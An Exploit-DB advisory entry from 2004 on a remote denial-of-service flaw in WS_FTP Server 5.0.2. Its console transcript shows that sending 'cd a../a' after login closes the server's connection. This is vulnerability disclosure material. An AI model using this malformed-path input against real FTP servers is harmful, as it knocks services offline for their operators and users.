Ipswitch WS_FTP Server 5.0.x - CD Command Malformed File Path Remote Denial of Service

EDB-ID:

24416


Author:

lion

Type:

dos


Platform:

Windows

Date:

2004-08-30


source: https://www.securityfocus.com/bid/11065/info

WS_FTP Server is reported prone to a remote denial of service vulnerability. This issue presents itself when the application processes a malformed file path through the 'cd' command.

WS_FTP Server version 5.0.2 is reported prone to this issue, however, other versions may be affected as well. 

E:\>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a
Connection closed by remote host.